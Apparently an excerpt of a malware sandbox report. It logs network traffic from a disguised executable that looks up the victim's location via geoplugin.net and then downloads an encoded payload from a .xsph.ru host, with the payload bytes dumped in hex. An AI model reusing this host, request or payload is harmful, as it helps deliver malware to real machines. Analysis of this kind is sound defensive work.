70 af 66 bb b9 5a 41 b7 70 5e a7 bb ad 6e 78 64 70 5a 76 5a 6a b1 62 66 72 6a 74 78 76 78 78 a7 bb a7 b1 b5 68 72 bb 7a ac 70 a9 1f 76 bb b7 af 96 74 6c 77 89 c3 78 bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a c1 b7 70 fe 62 bb 49 56 78 64 60 57 70 5a 8f b1 62 66 72 6a 74 68 76 78 78 a7 bb a7 b1 b5 68 72 bb bd 12 63 af af 5e bb b7 af 54 0c 72 62 91 c3 78 bb 5a a9 76 76 bb 5a 66 70 af d9 6a b9 0e bd b7 70 6e a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 66 72 6a 74 68 76 78 78 a7 bb 3c 1a db 7f 79 bb bd 6e f4 a3 5c 76 bb a7 af a9 b9 95 a9 74 c3 6c bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a e1 b7 70 d1 3c 32 86 84 7b 8e 70 6a dc 26 b5 b1 62 d9 b9 6a 74 6b b9 78 78 52 78 a7 b1 b5 68 72 bb bd 6e 76 a9 af 76 bb 3a af a9 3c 97 d9 7e 30 7a bb 5a a9 9f d5 bb 5a 66 d0 a9 66 c1 a7 5a c1 b7 ac 78 a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 a3 72 6a b4 93 7d 83 2c a7 bb a7 b1 72 68 72 bb bd 8b bb a9 af 6c bb b7 af fb bf 6c 62 74 c3 78 bb 5a a9 76 76 bb 5a 66 8d af 66 01 4a 92 7c 7d d3 32 a7 bb 50 74 78 64 70 e5 bb 5a 5a ad 62 66 72 9e 6a 68 76 78 78 a7 bb a7 b1 b5 68 72 bb bd 8b 76 a9 52 a5 32 83 1e e5 b9 6c 62 69 3e 78 bb 5a 96 bb 76 bb 2d 66 70 af b6 b7 b9 5a c1 b7 70 6e a7 bb bd 6e 78 64 70 87 76 5a 97 42 6b 90 81 2a 80 68 76 04 50 a7 bb a7 61 60 68 72 3c bd 6e 76 cb 5a 76 bb b7 af a9 b9 6c 62 74 c3 78 bb 5a 4c 76 76 44 5a 66 70 af 66 c1 b9 5a c1 b7 70 6e a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 66 72 6a 74 68 76 78 78 a7 bb a7 b1 b5 68 72 bb bd 6e 76 a9 af 76 bb b7 af a9 b9 6c 62 74 c3 78 bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a c1 b7 70 6e a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 66 72 6a 74 68 76 78 78 a7
                                                              Data Ascii: YgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQZ`bfrvthv_hrnvlbtxZvvZfpfZpnnhpjhb$Aw si}2}wq"y2$4.zyL"nxdpjv2`}^y W|2f(]$6iywg016t21 s[iO's"GD4p>kMwEZ8c442wtsbfrjthvxxhn?fZvv`lbtxZvlt^f@rZrnn*jvjZbjthxxhrxvvtflbtxvjZfpfZAp^nxdpZvZjbfrjtxvxxhrzpvtlwxZvvZfpfZpbIVxd`WpZbfrjthvxxhrc^TrbxZvvZfpjpnnxdpjvZZbfrjthvxx<yn\vtlZvvZfpfZp<2{pj&bjtkxxRxhrnvv:<~0zZZffZxnxdpjvZZbrj},rhrllbtxZvvZffJ|}2PtxdpZZbfrjhvxxhrvR2lbi>xZv-fpZpnnxdpvZBk*hvPa`hr<nvZvlbtxZLvvDZfpfZpnnxdpjvZZbfrjthvxxhrnvvlbtxZvvZfpfZpnnxdpjvZZbfrjthvxx
                                                              Sep 16, 2022 17:08:30.886750937 CEST138INData Raw: bb a7 b1 b5 68 72 bb bd 6e 76 a9 af 76 bb b7 af a9 b9 6c 62 74 c3 78 bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a c1 b7 70 6e a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 66 72 6a 74 68 76 78 78 a7 bb a7 b1 b5 68 72 bb bd 6e 76 a9 af 76 bb b7 af a9 b9 6c
                                                              Data Ascii: hrnvvlbtxZvvZfpfZpnnxdpjvZZbfrjthvxxhrnvvlbtxZvvZfpfZpnnxdpjvZZbfrjthvxxNr#~v(ftvz@v#GvpqVbfDv=bfnLvrq#WJxm:d^fk%,dp}V
                                                              Sep 16, 2022 17:08:30.886812925 CEST140INData Raw: c3 a9 b9 7b bf 90 87 78 23 8c b9 b7 76 c9 f3 f1 95 1f 9d c1 21 06 98 76 70 79 80 df 91 6e d0 4a 60 c3 76 90 f3 26 30 7a 3e 6a cc 52 66 b9 78 dd b2 20 95 c9 4c 72 23 9b 5e b7 a9 e5 f7 2c a1 cb a5 b9 d4 30 64 6a 78 c9 f3 9e b6 09 48 5a be 79 86 a7
                                                              Data Ascii: {x#v!vpynJ`v&0z>jRfx Lr#^,0djxHZy.JpltnCk^{6Z,t vbN8v{"n\}gJ^fn9oEsn_Cd/siZSb/B&{l1LBZ|v3pz?&tp4;Vuh,
                                                              Sep 16, 2022 17:08:30.886833906 CEST141INData Raw: 27 3c 56 a1 87 b9 a7 77 5a 29 eb 0f c3 4e 6e 78 7e 29 e7 ce 4b 89 b1 62 27 c6 62 2f 99 67 6d 31 fb 94 0f f3 ab 68 72 2a cf 27 f3 11 94 a3 bb b7 00 ed 3e 42 62 91 0a b4 3c 54 a9 37 be c1 73 60 27 84 a2 46 8f 5a e2 ee 71 5e 0f 38 76 6e 78 94 cd 7e
                                                              Data Ascii: '<VwZ)Nnx~)Kb'b/gm1hr*'>Bb<T7s`'FZq^8vnx~/nf;|QNh3KUtH\I4Zl;NwXvZKdWxzwjvZkdhvxrP,3?d^^Hu5l^W1"'.A@(td94frj5<<V0~*?RH\}b/
                                                              Sep 16, 2022 17:08:30.886850119 CEST143INData Raw: b9 64 70 2b c6 3b fb f2 4e 62 dd d2 0a a9 76 78 c5 44 da aa 64 48 c0 c0 ab bd 6e d3 d0 72 8a 23 d7 70 a9 b9 7e cd 35 a6 d0 f9 b3 a9 76 2f b6 8a 92 29 bc 98 fb c5 5a 8c de 0f d6 3d c1 bd 6e 81 64 79 6a 2f ac c2 a6 60 66 72 2b aa e5 f7 81 78 5a 38
                                                              Data Ascii: dp+;NbvxDdHnr#p~5v/)Z=ndyj/`fr+xZ86nj l}b0ipvZpz?q Z8$vrvjv;Zr{tqfA'/lf"}blv/lrfrn%hdp,1FlA3Br\R-Vjvzv
                                                              Sep 16, 2022 17:08:30.886862993 CEST144INData Raw: ee c3 5a 6e ee 19 cd 41 ef 23 6e 74 76 a9 80 2f ed 1f 1c 5a 6c b9 43 ac 1b a0 c1 5a a9 b7 40 ab 3b 2f 71 bf c9 19 0a 68 c1 b7 29 8f 36 a7 cd cb aa 60 70 df 2f 25 c2 2f b1 b3 bf e5 35 a0 ce b0 6a a7 bb 88 f8 03 c0 44 70 70 bb 2f f1 07 57 c1 b7 af
                                                              Data Ascii: ZnA#ntv/ZlCZ@;/qh)6`p/%/5jDpp/Wuv4Z/"bflq )x}nnjthl%3m'-rw`nnDJpnP,n\QZyb1#h#\\`jx;^p?Zp|Z
                                                              Sep 16, 2022 17:08:30.886877060 CEST145INData Raw: ce 85 0f 62 5c e0 6c 48 8d 1a 6c a3 a3 38 6e b3 48 a3 77 78 ed 5e c1 e5 84 8c df 29 6d 36 af dc 11 90 bc 0e 6c c3 a7 3b ff ba 2f ba b7 c1 41 d5 69 60 ee 26 ee 9a 8f ed 48 b2 85 bf 8e d0 30 3d ca 34 7b f0 e7 d4 3a bc 76 c5 72 ef 8b 0f 2f a0 40 03
                                                              Data Ascii: b\lHl8nHwx^)m6l;/Ai`&H0=4{:vr/@rZZEd?pxn$0A#Hp\b}"!Zv1jv~)tko%'d)Pg)@={**5}fj8-v.!xn?l)vxEd!th
                                                              Sep 16, 2022 17:08:30.886890888 CEST147INData Raw: 3f 13 a7 b3 df f6 05 19 f0 25 74 6a 80 cb ee b8 cb 7a f9 c9 bd 81 67 62 3b ce 43 b4 ca e8 c4 b5 c3 31 b0 0f 26 1f 64 68 c7 33 ed 25 73 09 5c 62 2f 05 7a 9e d5 94 94 43 76 e2 1f 23 08 d6 c3 c3 da f7 be a5 cc b3 74 e0 2b 20 a7 29 be 0f 97 c6 bb c5
                                                              Data Ascii: ?%tjzgb;C1&dh3%s\b/zCv#t+ )+fr5lZ,x3%\j~z51lnn;tltnEhZmk^5Uj/3n?k.j;Zn}y)(d?+Z%)pD!
                                                              Sep 16, 2022 17:08:30.886950970 CEST148INData Raw: 6e dc 37 69 6c c1 eb 35 66 9f f8 b4 c9 ca 25 0f b5 c3 31 41 36 d7 66 b2 f6 5c 87 94 25 7b 19 5c 62 37 ff ab f6 58 28 64 43 74 a1 f9 72 f1 ee 87 67 b3 31 25 36 ab 2d d8 32 e1 38 b7 df 27 f9 23 79 0f c5 b1 f4 aa 7d cf 50 c2 1e 95 bf 81 6d 88 2f a6
                                                              Data Ascii: n7il5f%1A6f\%{\b7X(dCtrg1%6-28'#y}Pm/KZd1kt5J/5i5jFht'#2);g~99dyZ#?\/\b5#\~y?!j'"'A}d#dysA?i`#h32nN8-r5P-Zfp
                                                              Sep 16, 2022 17:08:30.886972904 CEST149INData Raw: d9 80 8a 31 bf 0f 60 ca 64 68 41 79 22 28 27 3f 38 2e db 23 6a 21 5c 6c b9 69 6d e3 31 9e 86 11 a5 c6 6e a7 b3 83 2e 8f e8 f0 83 1c 92 27 8f 36 26 25 8a c8 b1 bd 2b f3 3b c2 09 41 be bf b7 35 03 0b e7 31 a7 da f7 f6 4c 79 a3 da 44 6f 96 8b ff 44
                                                              Data Ascii: 1`dhAy"('?8.#j!\lim1n.'6&%+;A51LyDoDZ)^vlb5iJ;TDzv)"<Es=+0{t}i\DogJo-3m#fi)tj+r=xd:igq3?1"6`CnFnj'^\/Ar!j'
                                                              Sep 16, 2022 17:08:30.948008060 CEST151INData Raw: dd 38 ab ce 9f b7 af a9 03 78 62 d9 76 7b 22 62 20 6a ce f3 b4 b3 bd f6 d6 d3 cb 31 07 34 5e bb 24 22 a9 d6 b8 1b bd b7 84 3b 62 f6 74 e3 b0 72 74 41 dd 69 6c 0f a9 a7 b1 b5 9a 6e bb 94 d6 6e a9 af 76 b2 96 07 cd b9 6c 62 fd 76 7b 22 66 20 5e ce
                                                              Data Ascii: 8xbv{"b j14^$";btrtAilnnvlbv{"f ^qlp`p+?fbfrjAnZT@tbt1v3h 2j\YduOrjt!d+nZ&QhrHvv.:t#Avv+wx!t)?}+b{qj3


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              2192.168.2.749726178.237.33.5080C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Sep 16, 2022 17:08:35.720278978 CEST653OUTGET /json.gp HTTP/1.1
                                                              Host: geoplugin.net
                                                              Cache-Control: no-cache
                                                              Sep 16, 2022 17:08:35.751432896 CEST654INHTTP/1.1 200 OK
                                                              date: Fri, 16 Sep 2022 15:08:35 GMT
                                                              server: Apache
                                                              expires: Fri, 16 Sep 2022 15:08:35 GMT
                                                              content-length: 945
                                                              content-type: application/json; charset=utf-8
                                                              cache-control: public, max-age=300
                                                              access-control-allow-origin: *
                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 34 2e 31 37 2e 35 32 2e 34 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 5a 75 72 69 63 68 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 5a 75 72 69 63 68 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 5a 48 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 72 69 63 68 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 45 55 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 45 75 72 6f 70 65 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 34 37 2e 34 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 38 2e 35 37 31 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 31 30 30 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 5c 2f 5a 75 72 69 63 68 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 2e 39 36 33 35 0a 7d
                                                              Data Ascii: { "geoplugin_request":"84.17.52.43", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Zurich", "geoplugin_region":"Zurich", "geoplugin_regionCode":"ZH", "geoplugin_regionName":"Zurich", "geoplugin_areaCode":"", "geoplugin_dmaCode":"", "geoplugin_countryCode":"CH", "geoplugin_countryName":"Switzerland", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"EU", "geoplugin_continentName":"Europe", "geoplugin_latitude":"47.43", "geoplugin_longitude":"8.5718", "geoplugin_locationAccuracyRadius":"1000", "geoplugin_timezone":"Europe\/Zurich", "geoplugin_currencyCode":"CHF", "geoplugin_currencySymbol":"CHF", "geoplugin_currencySymbol_UTF8":"CHF", "geoplugin_currencyConverter":0.9635}


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              3192.168.2.749727141.8.192.15180C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Sep 16, 2022 17:08:49.810384035 CEST656OUTGET /Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh HTTP/1.1
                                                              User-Agent: lVali
                                                              Host: f0719949.xsph.ru
                                                              Sep 16, 2022 17:08:49.877140045 CEST657INHTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Fri, 16 Sep 2022 15:08:49 GMT
                                                              Content-Length: 480659
                                                              Connection: keep-alive
                                                              Last-Modified: Thu, 15 Sep 2022 23:02:48 GMT
                                                              ETag: "75593-5e8bf3e785579"
                                                              Accept-Ranges: bytes
                                                              Data Raw: 10 0a 59 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 0a 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 0a 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 67 fa fc 4b 10 0e fc 4b 67 fc 38 38 02 4f 51 4d 85 fe 4b fc 67 7b 38 38 20 fc 67 fa 7b 32 0e 67 fe 02 4f 51 ee cf ea 5a 60 62 66 72 76 74 68 76 c5 c5 a7 bb 5f b1 b5 68 72 bb bd 6e 93 a9 af 76 bb b7 af a9 b9 6c 62 74 c3 78 bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a c1 b7 70 6e a7 bb bd 6e 68 ab 70 6a 68 c7 a0 bf 62 0a b5 e9 24 10 b9 41 f3 77 98 20 73 69 88 7d 32 7d 86 77 e3 71 96 cf d5 22 1c 79 7f 82 cd cd 98 32 24 1c 96 34 2e 7a 97 ee cb 86 7f 79 e1 c7 4c ab ad bd 22 bd 6e 78 64 70 6a 76 a5 0c a4 32 60 ef f5 7d 5e f3 e7 79 b1 9e b8 20 57 7c 92 32 66 eb e9 28 5d 8a 24 36 00 ac a6 85 10 90 69 79 b3 f7 b6 77 b3 06 84 67 c5 b2 f9 30 31 1a a7 36 74 eb b8 32 fc 31 9a 20 8c e7 e9 73 5b ee ae 1a 93 e7 eb 69 4f 27 eb 73 22 aa ae 1c c5 47 44 34 b1 f3 b6 1e 70 9e e7 1e 3e e7 f3 6b 4d dc a0 7f 92 ac e9 77 02 45 95 81 5a 03 9e 38 63 de a6 34 c3 aa a4 34 df 32 90 77 74 f3 05 73 b1 62 66 72 6a 74 68 76 78 78 a7 bb a7 b1 b5 68 dd 8f bd 6e 3f 66 5a 76 76 a7 60 e5 b9 6c 62 74 c3 78 bb 5a 09 76 6c 74 bb a9 5e af 66 40 72 5a c1 ab 72 6e a7 bb bd 6e 0c 2a c1 6a 76 6a 5a b1 62 d9 b9 6a 74 68 93 78 78 b7 bb a7 b1 a7 68 72 78 bd c1 76 a9 af 76 bb 74 af 66 b9 6c 62 74 c3 78 0b af a9 76 6a bb 5a 66 70 af 66 bb b9 5a 41 b7 70 5e a7 bb ad 6e 78 64 70 5a 76 5a 6a b1 62 66 72 6a 74 78 76 78 78 a7 bb a7 b1 b5 68 72 bb 7a ac 70 a9 1f 76 bb b7 af 96 74 6c 77 89 c3 78 bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a c1 b7 70 fe 62 bb 49 56 78 64 60 57 70 5a 8f b1 62 66 72 6a 74 68 76 78 78 a7 bb a7 b1 b5 68 72 bb bd 12 63 af af 5e bb b7 af 54 0c 72 62 91 c3 78 bb 5a a9 76 76 bb 5a 66 70 af d9 6a b9 0e bd b7 70 6e a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 66 72 6a 74 68 76 78 78 a7 bb 3c 1a db 7f 79 bb bd 6e f4 a3 5c 76 bb a7 af a9 b9 95 a9 74 c3 6c bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a e1 b7 70 d1 3c 32 86 84 7b 8e 70 6a dc 26 b5 b1 62 d9 b9 6a 74 6b b9 78 78 52 78 a7 b1 b5 68 72 bb bd 6e 76 a9 af 76 bb 3a af a9 3c 97 d9 7e 30 7a bb 5a a9 9f d5 bb 5a 66 d0 a9 66 c1 a7 5a c1 b7 ac 78 a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 a3 72 6a b4 93 7d 83 2c a7 bb a7 b1 72 68 72 bb bd 8b bb a9 af 6c bb b7 af fb bf 6c 62 74 c3 78 bb 5a a9 76 76 bb 5a 66 8d af 66 01 4a 92 7c 7d d3 32 a7 bb 50 74 78 64 70 e5 bb 5a 5a ad 62 66 72 9e 6a 68 76 78 78 a7 bb a7 b1 b5 68 72 bb bd 8b 76 a9 52 a5 32 83 1e e5 b9 6c 62 69 3e 78 bb 5a 96 bb 76 bb 2d 66 70 af b6 b7 b9 5a c1 b7 70 6e a7 bb bd 6e 78 64 70 87 76 5a 97 42 6b 90 81 2a 80 68 76 04 50 a7 bb a7 61 60 68 72 3c bd 6e 76 cb 5a 76 bb b7 af a9 b9 6c 62 74 c3 78 bb 5a 4c 76 76 44 5a 66 70 af 66 c1 b9 5a c1 b7 70 6e a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 66 72 6a 74 68 76 78 78 a7 bb a7 b1 b5 68 72 bb bd 6e 76 a9 af 76 bb b7 af a9 b9 6c 62 74 c3 78 bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a c1 b7 70 6e a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 66 72 6a 74 68 76 78 78 a7
                                                              Data Ascii: YgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQgKKg88OQMKg{88 g{2gOQZ`bfrvthv_hrnvlbtxZvvZfpfZpnnhpjhb$Aw si}2}wq"y2$4.zyL"nxdpjv2`}^y W|2f(]$6iywg016t21 s[iO's"GD4p>kMwEZ8c442wtsbfrjthvxxhn?fZvv`lbtxZvlt^f@rZrnn*jvjZbjthxxhrxvvtflbtxvjZfpfZAp^nxdpZvZjbfrjtxvxxhrzpvtlwxZvvZfpfZpbIVxd`WpZbfrjthvxxhrc^TrbxZvvZfpjpnnxdpjvZZbfrjthvxx<yn\vtlZvvZfpfZp<2{pj&bjtkxxRxhrnvv:<~0zZZffZxnxdpjvZZbrj},rhrllbtxZvvZffJ|}2PtxdpZZbfrjhvxxhrvR2lbi>xZv-fpZpnnxdpvZBk*hvPa`hr<nvZvlbtxZLvvDZfpfZpnnxdpjvZZbfrjthvxxhrnvvlbtxZvvZfpfZpnnxdpjvZZbfrjthvxx
                                                              Sep 16, 2022 17:08:49.877197027 CEST659INData Raw: bb a7 b1 b5 68 72 bb bd 6e 76 a9 af 76 bb b7 af a9 b9 6c 62 74 c3 78 bb 5a a9 76 76 bb 5a 66 70 af 66 c1 b9 5a c1 b7 70 6e a7 bb bd 6e 78 64 70 6a 76 5a 5a b1 62 66 72 6a 74 68 76 78 78 a7 bb a7 b1 b5 68 72 bb bd 6e 76 a9 af 76 bb b7 af a9 b9 6c
                                                              Data Ascii: hrnvvlbtxZvvZfpfZpnnxdpjvZZbfrjthvxxhrnvvlbtxZvvZfpfZpnnxdpjvZZbfrjthvxxNr#~v(ftvz@v#GvpqVbfDv=bfnLvrq#WJxm:d^fk%,dp}V
                                                              Sep 16, 2022 17:08:49.877216101 CEST660INData Raw: c3 a9 b9 7b bf 90 87 78 23 8c b9 b7 76 c9 f3 f1 95 1f 9d c1 21 06 98 76 70 79 80 df 91 6e d0 4a 60 c3 76 90 f3 26 30 7a 3e 6a cc 52 66 b9 78 dd b2 20 95 c9 4c 72 23 9b 5e b7 a9 e5 f7 2c a1 cb a5 b9 d4 30 64 6a 78 c9 f3 9e b6 09 48 5a be 79 86 a7
                                                              Data Ascii: {x#v!vpynJ`v&0z>jRfx Lr#^,0djxHZy.JpltnCk^{6Z,t vbN8v{"n\}gJ^fn9oEsn_Cd/siZSb/B&{l1LBZ|v3pz?&tp4;Vuh,
                                                              Sep 16, 2022 17:08:49.877233982 CEST661INData Raw: 27 3c 56 a1 87 b9 a7 77 5a 29 eb 0f c3 4e 6e 78 7e 29 e7 ce 4b 89 b1 62 27 c6 62 2f 99 67 6d 31 fb 94 0f f3 ab 68 72 2a cf 27 f3 11 94 a3 bb b7 00 ed 3e 42 62 91 0a b4 3c 54 a9 37 be c1 73 60 27 84 a2 46 8f 5a e2 ee 71 5e 0f 38 76 6e 78 94 cd 7e
                                                              Data Ascii: '<VwZ)Nnx~)Kb'b/gm1hr*'>Bb<T7s`'FZq^8vnx~/nf;|QNh3KUtH\I4Zl;NwXvZKdWxzwjvZkdhvxrP,3?d^^Hu5l^W1"'.A@(td94frj5<<V0~*?RH\}b/
                                                              Sep 16, 2022 17:08:49.877250910 CEST663INData Raw: b9 64 70 2b c6 3b fb f2 4e 62 dd d2 0a a9 76 78 c5 44 da aa 64 48 c0 c0 ab bd 6e d3 d0 72 8a 23 d7 70 a9 b9 7e cd 35 a6 d0 f9 b3 a9 76 2f b6 8a 92 29 bc 98 fb c5 5a 8c de 0f d6 3d c1 bd 6e 81 64 79 6a 2f ac c2 a6 60 66 72 2b aa e5 f7 81 78 5a 38
                                                              Data Ascii: dp+;NbvxDdHnr#p~5v/)Z=ndyj/`fr+xZ86nj l}b0ipvZpz?q Z8$vrvjv;Zr{tqfA'/lf"}blv/lrfrn%hdp,1FlA3Br\R-Vjvzv
                                                              Sep 16, 2022 17:08:49.877357006 CEST664INData Raw: ee c3 5a 6e ee 19 cd 41 ef 23 6e 74 76 a9 80 2f ed 1f 1c 5a 6c b9 43 ac 1b a0 c1 5a a9 b7 40 ab 3b 2f 71 bf c9 19 0a 68 c1 b7 29 8f 36 a7 cd cb aa 60 70 df 2f 25 c2 2f b1 b3 bf e5 35 a0 ce b0 6a a7 bb 88 f8 03 c0 44 70 70 bb 2f f1 07 57 c1 b7 af
                                                              Data Ascii: ZnA#ntv/ZlCZ@;/qh)6`p/%/5jDpp/Wuv4Z/"bflq )x}nnjthl%3m'-rw`nnDJpnP,n\QZyb1#h#\\`jx;^p?Zp|Z
                                                              Sep 16, 2022 17:08:49.877373934 CEST665INData Raw: ce 85 0f 62 5c e0 6c 48 8d 1a 6c a3 a3 38 6e b3 48 a3 77 78 ed 5e c1 e5 84 8c df 29 6d 36 af dc 11 90 bc 0e 6c c3 a7 3b ff ba 2f ba b7 c1 41 d5 69 60 ee 26 ee 9a 8f ed 48 b2 85 bf 8e d0 30 3d ca 34 7b f0 e7 d4 3a bc 76 c5 72 ef 8b 0f 2f a0 40 03
                                                              Data Ascii: b\lHl8nHwx^)m6l;/Ai`&H0=4{:vr/@rZZEd?pxn$0A#Hp\b}"!Zv1jv~)tko%'d)Pg)@={**5}fj8-v.!xn?l)vxEd!th
                                                              Sep 16, 2022 17:08:49.877392054 CEST667INData Raw: 3f 13 a7 b3 df f6 05 19 f0 25 74 6a 80 cb ee b8 cb 7a f9 c9 bd 81 67 62 3b ce 43 b4 ca e8 c4 b5 c3 31 b0 0f 26 1f 64 68 c7 33 ed 25 73 09 5c 62 2f 05 7a 9e d5 94 94 43 76 e2 1f 23 08 d6 c3 c3 da f7 be a5 cc b3 74 e0 2b 20 a7 29 be 0f 97 c6 bb c5
                                                              Data Ascii: ?%tjzgb;C1&dh3%s\b/zCv#t+ )+fr5lZ,x3%\j~z51lnn;tltnEhZmk^5Uj/3n?k.j;Zn}y)(d?+Z%)pD!
                                                              Sep 16, 2022 17:08:49.877408981 CEST668INData Raw: 6e dc 37 69 6c c1 eb 35 66 9f f8 b4 c9 ca 25 0f b5 c3 31 41 36 d7 66 b2 f6 5c 87 94 25 7b 19 5c 62 37 ff ab f6 58 28 64 43 74 a1 f9 72 f1 ee 87 67 b3 31 25 36 ab 2d d8 32 e1 38 b7 df 27 f9 23 79 0f c5 b1 f4 aa 7d cf 50 c2 1e 95 bf 81 6d 88 2f a6
                                                              Data Ascii: n7il5f%1A6f\%{\b7X(dCtrg1%6-28'#y}Pm/KZd1kt5J/5i5jFht'#2);g~99dyZ#?\/\b5#\~y?!j'"'A}d#dysA?i`#h32nN8-r5P-Zfp
